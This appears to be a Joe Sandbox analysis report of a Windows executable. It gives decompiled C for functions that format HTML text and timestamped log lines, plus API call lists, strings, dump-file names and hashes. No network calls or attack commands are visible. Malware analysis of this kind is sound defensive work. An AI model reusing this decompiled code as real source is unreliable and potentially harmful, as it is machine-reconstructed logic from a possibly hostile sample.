								_push(_t229);
								 *(_t315 - 4) = 0x11;
								L0043DE1A();
								 *(_t315 - 4) = 0x10;
								L0043DD36();
								 *(_t315 - 4) = 5;
							} else {
								L0043E144();
								 *(_t315 - 4) = 0xb;
								L0043E156();
								L0043DE26();
								 *(_t315 - 4) = 0xc;
								L0043DE26();
								 *(_t315 - 4) = 0xd;
								_t230 = _t315 - 0x58;
								L0043E282();
								_t231 = _t315 - 0x48;
								 *(_t315 - 4) = 0xe;
								L0043E282();
								 *(_t315 - 4) = 0xf;
								L0043DE1A();
								 *(_t315 - 4) = 0xe;
								L0043DD36();
								 *(_t315 - 4) = 0xd;
								L0043DD36();
								 *(_t315 - 4) = 0xc;
								L0043DD36();
								 *(_t315 - 4) = 0xb;
								L0043DD36();
								__imp__#6( *((intOrPtr*)(_t315 + 8)), _t231, _t231, _t230, _t226, _t230, _t226, _t315 - 0x28, _t237, "</P>\r\n", "\r\n", "<BR>",  *((intOrPtr*)(_t315 + 8)));
								 *(_t315 - 4) = 5;
							}
							L0043DD36();
							_t309 = _t315 - 0x44;
							asm("movsd");
							asm("movsd");
							 *((intOrPtr*)(_t315 - 0x2c)) =  *((intOrPtr*)(_t315 - 0x2c)) + 1;
							asm("movsd");
							asm("movsd");
						}
					}
					_t248 = _t315 - 0xec;
					_push(_t315 - 0x24);
					_push(_t315 - 0x7c);
					_push(_t315 - 0x18);
					_push(_t315 - 0x10);
					_push(_t315 - 0x14);
					_t202 = L00405C12(_t315 - 0x14, _t248, _t309);
					asm("sbb eax, eax");
					_t192 =  ~_t202 + 1;
					if( *((intOrPtr*)(_t315 - 0x24)) == 0) {
						_t309 = 0;
						continue;
					} else {
						if( *((intOrPtr*)(_t315 - 0x2c)) == 0) {
							goto L33;
						}
						 *(_t315 - 4) = 4;
						L0043DD36();
						 *(_t315 - 4) = 3;
						L0043DD36();
						 *(_t315 - 4) = 2;
						L0043DD36();
						 *(_t315 - 4) = 1;
						L0043DD36();
						 *(_t315 - 4) =  *(_t315 - 4) & 0x00000000;
						L0043DD36();
						_t309 = 1;
						goto L32;
					}
				}
				goto L33;
			}

0x004292f3
0x004292f8
0x004292fd
0x00429304
0x0042930c
0x00429311
0x00429314
0x0042931c
0x00429326
0x00429792
0x00429792
0x0042979c
0x004297a1
0x004297f2
0x004297f7
0x00429800
0x00429800
0x0042932f
0x00429337
0x0042933b
0x00429343
0x00429347
0x0042934f
0x00429353
0x0042935b
0x0042935f
0x0042936e
0x00429372
0x00429381
0x00429388
0x00429391
0x00429392
0x0042939b
0x004293a2
0x004293a9
0x004293b0
0x004293c1
0x004293c6
0x004293cf
0x004293d2
0x004293da
0x004293e0
0x004293e4
0x004293e8
0x004293ec
0x004293f0
0x004293f1
0x004293f4
0x004293fb
0x004293fd
0x00429401
0x004297a5
0x004297a8
0x004297ac
0x004297b4
0x004297b8
0x004297c0
0x004297c4
0x004297cc
0x004297d0
0x004297d5
0x004297dc
0x004297e1
0x004297eb
0x004297f0
0x00000000
0x004297f0
0x00429407
0x00429410
0x0042941e
0x0042941f
0x00429420
0x00429421
0x00429422
0x00429423
0x00429428
0x00429431
0x00429432
0x00429433
0x00429439
0x0042943f
0x00429444
0x00429447
0x00429448
0x0042944f
0x00429454
0x0042945d
0x00429463
0x0042946c
0x0042946f
0x00429470
0x00429471
0x00429476
0x00429479
0x00429481
0x00429486
0x0042948f
0x004294a4
0x004294a9
0x004294ad
0x004294b2
0x004294b3
0x004294b8
0x004294be
0x004294c2
0x004294d2
0x004294f4
0x004294f5
0x004294f5
0x004294fd
0x00429502
0x0042950a
0x0042950f
0x0042950f
0x00429515
0x00429520
0x00429522
0x00429528
0x0042952e
0x0042952a
0x0042952a
0x0042952a
0x00429535
0x0042953b
0x0042953e
0x00429542
0x00429547
0x00429549
0x0042954e
0x0042954e
0x00429553
0x0042955b
0x00429564
0x00429568
0x0042956d
0x00429570
0x00429574
0x0042957c
0x0042957c
0x0042958a
0x00429591
0x00429594
0x00429598
0x0042959d
0x004295a0
0x004295a5
0x004295a6
0x004295ab
0x004295b1
0x004295b5
0x004295c0
0x004295c1
0x004295c6
0x004295d1
0x004295d3
0x004295d9
0x004295df
0x004295db
0x004295db
0x004295db
0x004295e6
0x004295ec
0x004295ef
0x004295f3
0x004295f8
0x004295fa
0x004295ff
0x004295ff
0x00429604
0x004296b7
0x004296bc
0x004296c4
0x004296cc
0x004296cd
0x004296d0
0x004296d1
0x004296d2
0x004296d7
0x004296dc
0x004296dd
0x004296e0
0x004296e4
0x004296e5
0x004296ed
0x004296ee
0x004296f2
0x004296fa
0x004296fe
0x00429703
0x0042960a
0x00429610
0x00429622
0x00429626
0x00429633
0x0042963e
0x00429642
0x0042964a
0x00429650
0x00429654
0x0042965b
0x0042965e
0x00429663
0x0042966c
0x00429670
0x00429678
0x0042967c
0x00429684
0x00429688
0x00429690
0x00429694
0x0042969c
0x004296a0
0x004296a8
0x004296ae
0x004296b2
0x0042970a
0x0042970f
0x00429718
0x00429719
0x0042971a
0x0042971d
0x0042971e
0x0042971e
0x0042948f
0x00429722
0x00429728
0x0042972c
0x00429730
0x00429734
0x00429738
0x00429739
0x00429740
0x00429742
0x00429747
0x0042940e
0x00000000
0x0042974d
0x00429751
0x00000000
0x00000000
0x00429756
0x0042975a
0x00429762
0x00429766
0x0042976e
0x00429772
0x0042977a
0x0042977e
0x00429783
0x0042978a
0x00429791
0x00000000
0x00429791
0x00429747
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004292F8
#540.MFC42(?,00000001,00000000), ref: 0042932F
#540.MFC42(?,00000001,00000000), ref: 0042933B
#540.MFC42(?,00000001,00000000), ref: 00429347
#540.MFC42(?,00000001,00000000), ref: 00429353
#540.MFC42(?,00000001,00000000), ref: 0042935F
memset.MSVCRT ref: 00429372
memset.MSVCRT ref: 00429381
memset.MSVCRT ref: 004293C1
#548.MFC42(000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042943F
#548.MFC42(?,?,000007BC,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042944F
#548.MFC42(000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429471
#548.MFC42(?,?,000007E4,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429481

Part of subcall function 00429098: GetDateFormatA.KERNEL32(00000400,00000000,?,dddd, d MMMM,00455B1C,00000032,?,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290BD
Part of subcall function 00429098: CharUpperBuffA.USER32(00455B1C,00000001,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290C6
Part of subcall function 00429098: #537.MFC42(00455B1C,?,?,00429C3B,?,?,?,?,000007E4,?), ref: 004290D0

#2818.MFC42(?,<H1> %s</H1>,00000000,?,?,000007E4,?), ref: 004294B3
#800.MFC42(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004294C2
#939.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004294F5
#4202.MFC42(?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004294FD
CharUpperBuffA.USER32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042950F
#539.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0042955B
#858.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429568
#800.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00429574
SysFreeString.OLEAUT32(?), ref: 0042957C
#2818.MFC42(?,<H2>%s, %s</H2><H3>%s</H3>,?,00000000,?,?,?), ref: 004295A6
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004295B5
#939.MFC42(?,?,?,?,?,?), ref: 004295C1
#539.MFC42(?,?,?,?,?,?,?,?), ref: 00429610
#6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429626
#537.MFC42(</P>,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429633
#537.MFC42(<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429642
#922.MFC42(?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?,?,?,?,?,?), ref: 00429654
#922.MFC42(?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429663
#939.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429670
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 0042967C
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429688
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 00429694
#800.MFC42(00000000,?,00000000,00000000,?,00000000,?,<P>,</P>,00453C48,<BR>,?,?,?), ref: 004296A0
SysFreeString.OLEAUT32(?), ref: 004296A8
#6877.MFC42(00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296C4
#926.MFC42(?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296D2
#924.MFC42(?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296E5
#939.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296F2
#800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 004296FE
#800.MFC42(00000000,?,00000000,</P>,?,<P>,?,00453C48,<BR>,?,?,?,?,?,?,?), ref: 0042970A
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0042975A
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00429766
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00429772
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0042977E
#800.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0042978A
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297AC
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297B8
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297C4
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297D0
#800.MFC42(?,?,?,?,?,?,?,00000001,00000000), ref: 004297DC

Strings

</P>, xrefs: 0042962B, 004296D7
<P>, xrefs: 00429407, 0042963A, 004296D0
<H1> %s</H1>, xrefs: 004294AD
<H2>%s, %s</H2><H3>%s</H3>, xrefs: 004295A0
<BR>, xrefs: 00429615, 004296B7

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#540$#548#939$#537memset$#2818#539#6877#922BuffCharFreeStringUpper$#4202#858#924#926DateFormatH_prolog
String ID: </P>$<BR>$<H1> %s</H1>$<H2>%s, %s</H2><H3>%s</H3>$<P>
API String ID: 157677795-3437667793
Opcode ID: 00c3331556e37c13ae1a57c4506a8fd5b17bb99e585df87ea54cc74aef307ee2
Instruction ID: f09f40e4119619c89d9f0bc648561b01ad262bceca3cf30f729d958ec0790494
Opcode Fuzzy Hash: 00c3331556e37c13ae1a57c4506a8fd5b17bb99e585df87ea54cc74aef307ee2
Instruction Fuzzy Hash: 95F18D31D00259EADF11EBE1D845BEEBBB8AF19308F50409EE405B7182DB785F49CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F818, Relevance: 93.0, APIs: 51, Strings: 2, Instructions: 286
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 59%

			E0040F818(intOrPtr* __ecx) {
				void* _t149;
				void* _t150;
				intOrPtr _t152;
				void* _t155;
				intOrPtr _t157;
				void* _t160;
				intOrPtr _t162;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				intOrPtr _t171;
				intOrPtr _t176;
				void* _t177;
				intOrPtr _t179;
				void* _t181;
				void* _t182;
				intOrPtr _t184;
				intOrPtr* _t191;
				signed int _t192;
				void* _t264;
				void* _t266;
				void* _t267;

				E0043E4E0(0x440428, _t264);
				_t267 = _t266 - 0x2c;
				_t191 = __ecx;
				 *(_t264 - 4) =  *(_t264 - 4) & 0x00000000;
				asm("movsw");
				asm("movsb");
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x14)) - 8)) -  *((intOrPtr*)(__ecx + 0x18)) > 1) {
					L0043DDE4();
					 *(_t264 - 4) = 1;
					L0043DDD8();
					 *(_t264 - 4) = 2;
					L0043DDCC();
					 *((intOrPtr*)( *((intOrPtr*)(_t264 - 0x38)) + 0x30))(0, 2,  *((intOrPtr*)(_t264 + 8)), 0xb021, 0);
					_push(_t264 - 0x24);
					_t149 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0xc))();
					 *(_t264 - 4) = 3;
					_push(_t264 - 0x10);
					_push(_t149);
					_t150 = _t264 - 0x20;
					_push(_t150);
					L0043DE20();
					_push(_t150);
					 *(_t264 - 4) = 4;
					L0043DFCA();
					 *(_t264 - 4) = 3;
					L0043DD36();
					 *(_t264 - 4) = 2;
					L0043DD36();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					_t152 =  *((intOrPtr*)(_t264 - 0x14));
					_push( *((intOrPtr*)(_t152 - 8)));
					_push(_t152);
					L0043E28E();
					_push(_t264 - 0x10);
					_push(_t191 + 0xc);
					_t155 = _t264 - 0x24;
					_push(_t155);
					L0043DE20();
					_push(_t155);
					 *(_t264 - 4) = 5;
					L0043DFCA();
					 *(_t264 - 4) = 2;
					L0043DD36();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					_t157 =  *((intOrPtr*)(_t264 - 0x14));
					_push( *((intOrPtr*)(_t157 - 8)));
					_push(_t157);
					L0043E28E();
					_push(_t264 - 0x10);
					_push(_t191 + 8);
					_t160 = _t264 - 0x24;
					_push(_t160);
					L0043DE20();
					_push(_t160);
					 *(_t264 - 4) = 6;
					L0043DFCA();
					 *(_t264 - 4) = 2;
					L0043DD36();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					_t162 =  *((intOrPtr*)(_t264 - 0x14));
					_push( *((intOrPtr*)(_t162 - 8)));
					_push(_t162);
					L0043E28E();
					_push(_t264 - 0x10);
					_push(_t191 + 0x10);
					_t165 = _t264 - 0x24;
					_push(_t165);
					L0043DE20();
					_push(_t165);
					 *(_t264 - 4) = 7;
					L0043DFCA();
					 *(_t264 - 4) = 2;
					L0043DD36();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					_t167 =  *((intOrPtr*)(_t264 - 0x14));
					_push( *((intOrPtr*)(_t167 - 8)));
					_push(_t167);
					L0043E28E();
					_t168 = _t264 - 0x18;
					_push(_t168);
					L0043E162();
					L0043DDD8();
					_push(0);
					 *(_t264 - 4) = 8;
					L0043E288();
					_t169 =  *_t168;
					_push(0);
					 *((intOrPtr*)(_t264 - 0x24)) = _t169;
					L0043E288();
					_t170 =  *((intOrPtr*)(_t169 + 4));
					_push(0);
					 *((intOrPtr*)(_t264 - 0x20)) = _t170;
					L0043E288();
					_t171 =  *((intOrPtr*)(_t170 + 8));
					_push(0);
					 *((intOrPtr*)(_t264 - 0x28)) = _t171;
					L0043E288();
					_push(0);
					L0043E288();
					_push(0);
					L0043E288();
					_push( *((intOrPtr*)(_t264 - 0x24)));
					_push( *((intOrPtr*)(_t264 - 0x20)));
					_push( *((intOrPtr*)(_t264 - 0x28)));
					_push( *((intOrPtr*)(_t171 + 0x14)) + 0x76c);
					_push( *((intOrPtr*)(_t171 + 0x10)) + 1);
					_push( *((intOrPtr*)(_t171 + 0xc)));
					_push("%02d-%02d-%d %02d:%02d:%02d\r\n");
					_push(_t264 - 0x1c);
					L0043E174();
					_push(_t264 - 0x1c);
					L0043DFCA();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					_t176 =  *((intOrPtr*)(_t264 - 0x14));
					_push( *((intOrPtr*)(_t176 - 8)));
					_push(_t176);
					L0043E28E();
					_push( *((intOrPtr*)(_t191 + 0x18)));
					_t177 = _t264 - 0x28;
					_push(_t177);
					L0043DFB2();
					_push(_t177);
					 *(_t264 - 4) = 9;
					L0043DFCA();
					 *(_t264 - 4) = 8;
					L0043DD36();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					_t179 =  *((intOrPtr*)(_t264 - 0x14));
					_push( *((intOrPtr*)(_t179 - 8)));
					_push(_t179);
					L0043E28E();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					 *(_t267 + 0x20) = L"$#$#$#$#$#$#$#$#$#$#$#$#$#$\r\n";
					L0043E144();
					_t181 = _t264 - 0x10;
					_push(_t181);
					 *(_t264 - 4) = 0xa;
					L0043DE26();
					 *(_t264 - 4) = 0xb;
					_push(_t264 - 0x20);
					_push(_t181);
					_t182 = _t264 - 0x28;
					_push(_t182);
					L0043E282();
					_push(_t182);
					 *(_t264 - 4) = 0xc;
					L0043DFCA();
					 *(_t264 - 4) = 0xb;
					L0043DD36();
					 *(_t264 - 4) = 0xa;
					L0043DD36();
					 *(_t264 - 4) = 8;
					L0043DD36();
					E00429085( *((intOrPtr*)(_t264 - 0x14)));
					_t184 =  *((intOrPtr*)(_t264 - 0x14));
					_push( *((intOrPtr*)(_t184 - 8)));
					_push(_t184);
					L0043E28E();
					 *((intOrPtr*)(_t191 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x14)) - 8));
					L0043E27C();
					_push(_t264 - 0x28);
					L0043E276();
					 *(_t264 - 4) = 0xd;
					E0042AAFA( *((intOrPtr*)(_t264 - 0x28)));
					 *(_t264 - 4) = 8;
					L0043DD36();
					 *(_t264 - 4) = 2;
					L0043DD36();
					 *(_t264 - 4) = 1;
					L0043DD36();
					 *(_t264 - 4) =  *(_t264 - 4) & 0x00000000;
					L0043DDC0();
					_t192 = 1;
				} else {
					_t192 = 0;
				}
				 *(_t264 - 4) =  *(_t264 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t264 - 0xc));
				return _t192;
			}

0x0040f81d
0x0040f822
0x0040f828
0x0040f835
0x0040f839
0x0040f83b
0x0040f845
0x0040f851
0x0040f859
0x0040f85d
0x0040f870
0x0040f874
0x0040f882
0x0040f88a
0x0040f88d
0x0040f893
0x0040f897
0x0040f898
0x0040f899
0x0040f89c
0x0040f89d
0x0040f8a2
0x0040f8a6
0x0040f8aa
0x0040f8b2
0x0040f8b6
0x0040f8be
0x0040f8c2
0x0040f8ca
0x0040f8cf
0x0040f8d6
0x0040f8d9
0x0040f8da
0x0040f8e2
0x0040f8e6
0x0040f8e7
0x0040f8ea
0x0040f8eb
0x0040f8f0
0x0040f8f4
0x0040f8f8
0x0040f900
0x0040f904
0x0040f90c
0x0040f911
0x0040f918
0x0040f91b
0x0040f91c
0x0040f924
0x0040f928
0x0040f929
0x0040f92c
0x0040f92d
0x0040f932
0x0040f936
0x0040f93a
0x0040f942
0x0040f946
0x0040f94e
0x0040f953
0x0040f95a
0x0040f95d
0x0040f95e
0x0040f966
0x0040f96a
0x0040f96b
0x0040f96e
0x0040f96f
0x0040f974
0x0040f978
0x0040f97c
0x0040f984
0x0040f988
0x0040f990
0x0040f995
0x0040f99c
0x0040f99f
0x0040f9a0
0x0040f9a5
0x0040f9a8
0x0040f9a9
0x0040f9b1
0x0040f9b6
0x0040f9ba
0x0040f9be
0x0040f9c3
0x0040f9c5
0x0040f9c9
0x0040f9cc
0x0040f9d1
0x0040f9d4
0x0040f9d8
0x0040f9db
0x0040f9e0
0x0040f9e3
0x0040f9e7
0x0040f9ea
0x0040f9f2
0x0040f9fc
0x0040fa04
0x0040fa0a
0x0040fa0f
0x0040fa15
0x0040fa18
0x0040fa1b
0x0040fa1c
0x0040fa1d
0x0040fa21
0x0040fa26
0x0040fa27
0x0040fa35
0x0040fa36
0x0040fa3e
0x0040fa43
0x0040fa4a
0x0040fa4d
0x0040fa4e
0x0040fa53
0x0040fa56
0x0040fa5c
0x0040fa5f
0x0040fa64
0x0040fa68
0x0040fa6c
0x0040fa74
0x0040fa78
0x0040fa80
0x0040fa85
0x0040fa8c
0x0040fa8f
0x0040fa90
0x0040fa98
0x0040faa0
0x0040faa7
0x0040faac
0x0040fab2
0x0040fab3
0x0040fab7
0x0040fabf
0x0040fac3
0x0040fac4
0x0040fac5
0x0040fac8
0x0040fac9
0x0040face
0x0040fad2
0x0040fad6
0x0040fade
0x0040fae2
0x0040faea
0x0040faee
0x0040faf6
0x0040fafa
0x0040fb02
0x0040fb07
0x0040fb0e
0x0040fb11
0x0040fb12
0x0040fb1f
0x0040fb22
0x0040fb2d
0x0040fb2e
0x0040fb35
0x0040fb39
0x0040fb3f
0x0040fb46
0x0040fb4e
0x0040fb52
0x0040fb5a
0x0040fb5e
0x0040fb63
0x0040fb6a
0x0040fb6f
0x0040f847
0x0040f847
0x0040f847
0x0040fb71
0x0040fb78
0x0040fb85
0x0040fb8d

APIs

__EH_prolog.LIBCMT ref: 0040F81D
#354.MFC42(?,?,?), ref: 0040F851
#540.MFC42(?,?,?), ref: 0040F85D
#5186.MFC42(?,0000B021,00000000,?,?,?), ref: 0040F874
#924.MFC42(?,00000000,?,?,?), ref: 0040F89D
#858.MFC42(00000000,?,00000000,?,?,?), ref: 0040F8AA
#800.MFC42(00000000,?,00000000,?,?,?), ref: 0040F8B6
#800.MFC42(00000000,?,00000000,?,?,?), ref: 0040F8C2
#6385.MFC42(?,?,00000000,?,00000000,?,?,?), ref: 0040F8DA
#924.MFC42(?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F8EB
#858.MFC42(00000000,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F8F8
#800.MFC42(00000000,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F904
#6385.MFC42(?,?,00000000,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0040F91C
#924.MFC42(?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040F92D
#858.MFC42(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040F93A
#800.MFC42(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,00000000,?), ref: 0040F946
#6385.MFC42(?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0040F95E
#924.MFC42(?,?,?,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0040F96F
#800.MFC42(?,?,?,00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 0040FB78

Strings

%02d-%02d-%d %02d:%02d:%02d, xrefs: 0040FA21
H<E, xrefs: 0040F82D

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#924$#6385#858$#354#5186#540H_prolog
String ID: %02d-%02d-%d %02d:%02d:%02d$H<E
API String ID: 1500017196-2734843972
Opcode ID: fcf880664d70c04f9b026bfc0fbd1729dba82b31dae0b5f440ac611373c4f4dc
Instruction ID: 252fb8750a8e687878b14574fe1f347268a49ee5709fe182139386791220672e
Opcode Fuzzy Hash: fcf880664d70c04f9b026bfc0fbd1729dba82b31dae0b5f440ac611373c4f4dc
Instruction Fuzzy Hash: 21C12C72C01149EACF05EBE5D995AEEBBB9AF1D304F10108EF50177192DB386A08CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00426FF6, Relevance: 89.6, APIs: 50, Strings: 1, Instructions: 362
timeCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00426FF6(void* __ecx, void* __edi, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t174;
				void* _t177;
				void* _t180;
				void* _t183;
				void* _t193;
				void* _t194;
				void* _t196;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				intOrPtr* _t220;
				intOrPtr* _t224;
				signed int _t259;
				void* _t297;
				char _t298;
				void* _t307;
				void* _t313;
				void* _t315;
				void* _t317;

				E0043E4E0(0x442d35, _t313);
				E0043E690(0x136c, __ecx);
				_push(_t307);
				_push( *((intOrPtr*)(_t313 + 8)));
				_t174 = E004274E3(_t313 - 0x1378);
				 *(_t313 - 4) = 0;
				if( *((intOrPtr*)(_t313 - 0x1374)) != 0) {
					if( *((intOrPtr*)(_t313 - 0x12ac)) != 0) {
						L00412BAB(_t174, 0, _t313 - 0x64, _t297, _t307);
						_push(0);
						_push( *((intOrPtr*)(_t313 - 0x1278)));
						 *(_t313 - 4) = 3;
						_push(_t313 - 0x12de);
						_push(_t313 - 0x1310);
						_t177 = _t313 - 0x1374;
						_push( *((intOrPtr*)(_t313 - 0x1378)));
						_push(_t177);
						L00412C8A(_t177, 0, _t313 - 0x64, _t297, _t307);
						if(_t177 != 0) {
							L00411E5A(_t177, 0, _t313 - 0x29c, _t297, _t307);
							_push(_t313 - 0x12ac);
							 *(_t313 - 4) = 5;
							L0043DE26();
							_push(_t313 - 0x10);
							 *(_t313 - 4) = 6;
							_t180 = E00410E20(_t313 - 0x18);
							_push(0);
							_push(_t180);
							 *(_t313 - 4) = 7;
							L00412165(_t180, 0, _t313 - 0x29c, _t297, _t307);
							 *(_t313 - 4) = 8;
							L0043DD36();
							 *(_t313 - 4) = 6;
							L0043DD36();
							 *(_t313 - 4) = 5;
							L0043DD36();
							_push(_t313 - 0x12ac);
							L0043DE26();
							_push(_t313 - 0x10);
							 *(_t313 - 4) = 9;
							_t183 = E00410E20(_t313 - 0x18);
							 *(_t313 - 4) = 0xa;
							E00410E56(_t313 - 0x298, _t183);
							 *(_t313 - 4) = 0xb;
							L0043DD36();
							 *(_t313 - 4) = 9;
							L0043DD36();
							 *(_t313 - 4) = 5;
							L0043DD36();
							_push(_t313 - 0x34);
							L0043E162();
							_push(_t313 - 0x48);
							L0043E4A4();
							 *(_t313 - 0xcc) = 0;
							GetTimeFormatA(0x400, 2, _t313 - 0x48, 0, _t313 - 0xcc, 0x32);
							 *(_t313 - 0x98) = 0;
							GetDateFormatA(0x400, 0, _t313 - 0x48, 0, _t313 - 0x98, 0x32);
							_t193 = _t313 - 0xcc;
							_push(_t193);
							L0043DE26();
							_t194 = _t313 - 0x98;
							_push(_t194);
